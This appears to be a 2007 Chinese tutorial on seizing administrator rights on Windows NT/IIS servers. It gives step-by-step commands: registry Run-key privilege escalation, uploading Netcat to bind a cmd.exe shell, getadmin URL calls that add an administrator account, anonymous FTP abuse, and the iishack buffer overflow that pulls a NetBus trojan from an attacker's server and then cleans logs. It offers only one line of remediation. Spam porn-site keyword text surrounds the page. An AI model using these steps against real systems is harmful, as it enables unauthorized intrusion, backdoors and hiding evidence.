国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

教你獲取WindowsNT的Admin權限的方法
2007-01-15   

一、通過修改注冊表

凡是具有登錄NT本機的用戶,例如IUSR_machine,都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限,該用戶可以遠程訪問這個項。比如,他可以創建一個bat文件,文件內容為:cmd.exe /c net localgroup administrators IUSR_machine /add,把該文件copy到winnt目錄下,然后在注冊表上述的項添加一個數值,指向這個文件。

那么,當下次Admin登錄到該機器上時,就會自動把IUSR_machine添加到Administrators組。

另,注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。

二、自建Telnet服務在NT上執行指令

要求用戶有文件上傳權限,而且該目錄位于web目錄下,該目錄允許執行,下面是具體步驟。

假設你的目錄是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個目錄上去。

然后,在瀏覽器端輸入:

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

這時候,你的瀏覽器將停止不動,實際上,Server上的Telnet的服務已經產生了。

這時,用Telnet連接www.xxx.com的23端口。你發現,不用密碼,不用登陸,對方C:\提示符已經出現在你的眼前!更妙的是,這個Telnet server是一個一次性的服務,當客戶端一退出,該服務也將終止。

Netcat不同于一般的特洛伊木馬,它可以構建任何的TCP連接服務。在瀏覽器端輸入上述的字符串,等價于在NT的Dos方式下輸入

nc -l -p 23 -t -e cmd.exe

這將把cmd.exe綁定到23端口上。

三、入侵NTserver典型途徑V2.0

1、如果你有NT/IIS服務器的任何一個帳號,哪怕是guest帳號,都可以獲得root。

2、用Netcat和iishack可以獲得root。

3、Iusr_計算機名這個帳號有ftp上傳,web執行等權限。

4、在Web server上執行程序是入侵NT的關鍵。

5、要在Web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去。

在本文中,目標機器的名稱是ntsvr2,目標機器的域名是www.xxx.com,目標機器上有scripts和cgi-bin目錄,scripts目錄下有uploadn.asp等asp程序,可能有guest帳號,肯定有iusr_ntsvr2這個帳號。

第一個方法、用Iusr_ntsvr2后者Guest這兩個帳號

這里假設我們已經破解了這個帳號的密碼,在瀏覽器輸入:

http://www.xxx.com/scripts/uploadn.asp

guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面,在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄。

然后輸入:

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員。

下面可以Add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創建了一個叫china用戶,密碼是news,然后:

http://www.xxx.com/scripts/getadmin.exe?china

第二個方法、用匿名Ftp

如果允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com 
Connected to www.xxx.com 
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2這個東西暴露了其NETbios名,那么在IIS的背景下,必然會有一個IUSR_ntsvr2的用戶帳號,屬于Domain user組,這個帳號我們以后要用來獲取Administrator的權限。

User (www.xxx.com:(none)):anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.

Password:輸入 guest@ 或者guest。

對于缺乏網絡安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號,雖然只屬于Domain guest組。在這種情況下我們就可以進NT server的ftp了。

進去以后,看看目錄列表,試試 cd /scripts 或cgi-bin等關鍵目錄,如果運氣好,改變目錄成功,這時你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin,然后輸入:

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創建了一個叫china用戶,密碼是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帳號登陸,就可以有最大的權限了,也可以用上面的cmd.exe的方法直接修改 如果沒有cmd.exe,也可以自己傳一個上去到scripts/tools或者cgi-bin目錄。

第三個方法、用netcat和iishack

如果你熟悉使用Netcat這個工具,你就知道,netcat可以利用NT的弱點在其上綁定端口,下面用eEye的工具已經介紹過,如果你熟悉Netcat,成功的可能性會更大。

IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關于NT/IIS的問題和工具。在IIS的/Inetsrv目錄下,有個DLL文件叫ism.dll,這個模塊在web運行的時候就被加載到較高的內存地址,并且導致了零字節問題到處出現IIShack.asm,利用這個毛病,eEye寫了兩個程序:

iishack.exe 
ncx99.exe

為達目的你必須自己有一個web server,把ncx99.exe和netbus木馬傳到這個web server的目錄下,比如你的web server是:

www.mysvr.com? 而對方的IIS server是www.xxx.com

則:

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)

上述命令輸入后這時你應該可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- 
(c) dark spyrit -- barns@eeye.com. 
http://www.eEye.com 
[usage: iishack ] 
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe 
do not include 'http://' before hosts! 
--------------------------------------------------------------- 
Data sent!

然后,再把Netbus等特洛伊木馬傳到對方機器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe

ncx99.exe實際上是有名的Netcat的變種,它把對方server的cmd.exe綁定到Telnet服務。 ncx.exe 這是較早的版本,是把端口綁到80的,由于80端口跑web服務,端口已經被使用。所以可能不一定有效。然后,用Telnet到對方的99或80端口:

Telnet www.xxx.com 99

結果是這樣:

Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

C:\>[You have full access to the system, happy browsing :)] 
C:\>[Add a scheduled task to restart inetinfo in X minutes] 
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] 
C:\>[Clean up any trace or logs we might have left behind.]

這樣,你就完全控制了其硬盤上的文件!注意,如果你type exit退出,對方server上的這個進程也會退出。

補救方法:在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除。

其它:用Retina.exe得到NT域內的帳號清單,逐個嘗試這些帳號,如果有的密碼薄弱而被你猜出來,就可以用上面的方法來獲取NT的Admin。

責任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:Windows系統中多種隱藏超級用戶方法
下一篇:執行文件方式加密FLASH文件的解密方法

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
色噜噜狠狠色综合中国| 91福利社在线观看| 大美女一区二区三区| 91福利国产成人精品照片| 欧美一区二区三级| 日韩美女视频一区| 国产在线精品免费av| 欧美亚洲国产bt| 欧美韩国一区二区| 日韩经典一区二区| 色综合久久久网| 国产免费成人在线视频| 久久精品国产秦先生| 欧美日韩亚洲丝袜制服| 日韩美女视频一区二区| 成人一二三区视频| xf在线a精品一区二区视频网站| 亚洲午夜羞羞片| 色综合天天综合色综合av| 一区二区三区在线看| 国产乱淫av一区二区三区| 91精品国产色综合久久久蜜香臀| 亚洲激情自拍偷拍| 成人免费毛片aaaaa**| 国产三级一区二区| 国产一区二区三区四| 久久人人爽爽爽人久久久| 蜜桃视频第一区免费观看| 欧美精品在线观看播放| 亚洲第一搞黄网站| 欧美裸体一区二区三区| 午夜国产精品一区| 欧美男生操女生| 日韩和的一区二区| 欧美精品精品一区| 免费欧美在线视频| 欧美成va人片在线观看| 久久成人麻豆午夜电影| 日韩精品影音先锋| 九九久久精品视频| 国产午夜精品一区二区| 波多野结衣一区二区三区| 中文字幕二三区不卡| 成人av电影在线播放| 亚洲视频香蕉人妖| 在线免费av一区| 日韩成人av影视| 精品欧美乱码久久久久久 | 国产精品911| 中文字幕制服丝袜一区二区三区| 9色porny自拍视频一区二区| 亚洲人一二三区| 欧美日韩亚洲不卡| 韩国av一区二区三区| 国产日韩精品一区二区三区在线| 成人国产精品视频| 亚洲成av人片在线观看无码| 日韩免费高清视频| 成人午夜又粗又硬又大| 亚洲一区二区av电影| 精品久久久久久无| 91在线观看地址| 另类调教123区| 一色桃子久久精品亚洲| 91精品国产欧美日韩| 国产福利一区二区三区在线视频| 亚洲乱码中文字幕综合| 精品国产青草久久久久福利| a级精品国产片在线观看| 日韩在线播放一区二区| 国产蜜臀av在线一区二区三区| 欧洲精品一区二区| 国产成人av一区二区三区在线| 亚洲欧洲中文日韩久久av乱码| 7777精品伊人久久久大香线蕉经典版下载 | 自拍偷拍亚洲综合| 日韩午夜在线观看视频| 97久久精品人人做人人爽50路| 日韩影院精彩在线| 亚洲精品成人在线| 国产亚洲婷婷免费| 欧美高清视频不卡网| 白白色 亚洲乱淫| 老司机精品视频在线| 一区二区三区.www| 国产精品久久久99| 欧美成人三级在线| 欧美精品在线观看播放| av在线免费不卡| 国产福利电影一区二区三区| 丝瓜av网站精品一区二区 | av中文一区二区三区| 国产在线精品一区二区| 天堂精品中文字幕在线| 亚洲综合在线视频| 国产精品国产三级国产a| 亚洲欧美国产三级| 国产精品久久久久久久久搜平片| 精品三级在线看| 欧美一区二区在线免费观看| 欧美性淫爽ww久久久久无| www.日本不卡| 福利一区二区在线| 国产一区在线观看麻豆| 裸体一区二区三区| 蜜臀99久久精品久久久久久软件| 亚洲精品国产a| 亚洲欧美区自拍先锋| 亚洲欧美综合网| 国产精品―色哟哟| 国产精品美女久久久久久久网站| 久久久久久久电影| 欧美韩国一区二区| 中文一区在线播放| 国产精品美日韩| 国产精品进线69影院| 国产精品青草久久| 国产精品乱码人人做人人爱| 国产精品久久久久毛片软件| 日韩一区中文字幕| 亚洲欧美电影一区二区| 亚洲一级二级在线| 性久久久久久久| 青青青爽久久午夜综合久久午夜| 天天亚洲美女在线视频| 麻豆成人91精品二区三区| 精品一区二区三区视频| 国产乱码字幕精品高清av| 国产v综合v亚洲欧| 91丨九色丨蝌蚪富婆spa| 欧洲精品中文字幕| 日韩精品在线一区二区| 久久久久久久久蜜桃| 自拍视频在线观看一区二区| 一区二区三区在线影院| 午夜久久久影院| 国产一区二三区| av色综合久久天堂av综合| 色婷婷综合久久久中文一区二区| 欧美性大战久久久久久久| 日韩女优av电影| 国产精品你懂的| 亚洲主播在线观看| 精品一区二区三区在线播放 | 在线看不卡av| 日韩一级黄色片| 欧美国产国产综合| 亚洲国产精品久久久久婷婷884 | 天涯成人国产亚洲精品一区av| 美女爽到高潮91| thepron国产精品| 欧美精品在线观看播放| 中文字幕的久久| 天堂蜜桃91精品| www.欧美色图| 欧美一级片免费看| 亚洲欧美在线视频| 美国毛片一区二区三区| 99久久久久久99| 欧美白人最猛性xxxxx69交| 亚洲视频在线观看三级| 久久99久久99精品免视看婷婷| 成人性生交大片免费看中文网站| 欧美日本国产视频| 综合欧美亚洲日本| 狠狠网亚洲精品| 欧美猛男超大videosgay| 欧美激情一区二区三区不卡| 五月天亚洲婷婷| www.久久久久久久久| 久久综合久久99| 水野朝阳av一区二区三区| 91小宝寻花一区二区三区| 久久综合精品国产一区二区三区| 亚洲国产欧美在线人成| 一本色道久久综合亚洲91| 久久综合九色综合97婷婷| 奇米一区二区三区av| 欧美日韩精品三区| 亚洲男同性视频| www.亚洲免费av| 中文字幕欧美日韩一区| 激情另类小说区图片区视频区| 欧美肥妇bbw| 亚洲成a人v欧美综合天堂| 色综合中文字幕| 日韩一区中文字幕| 成人免费av资源| 中文字幕第一区二区| 国产成都精品91一区二区三| 久久久精品一品道一区| 国产在线国偷精品产拍免费yy | 欧美日韩高清不卡| 亚洲国产日韩综合久久精品| 在线观看日韩精品| 一区二区三区毛片| 在线这里只有精品| 亚洲一区二区在线免费观看视频| 色噜噜夜夜夜综合网| 亚洲一二三区视频在线观看|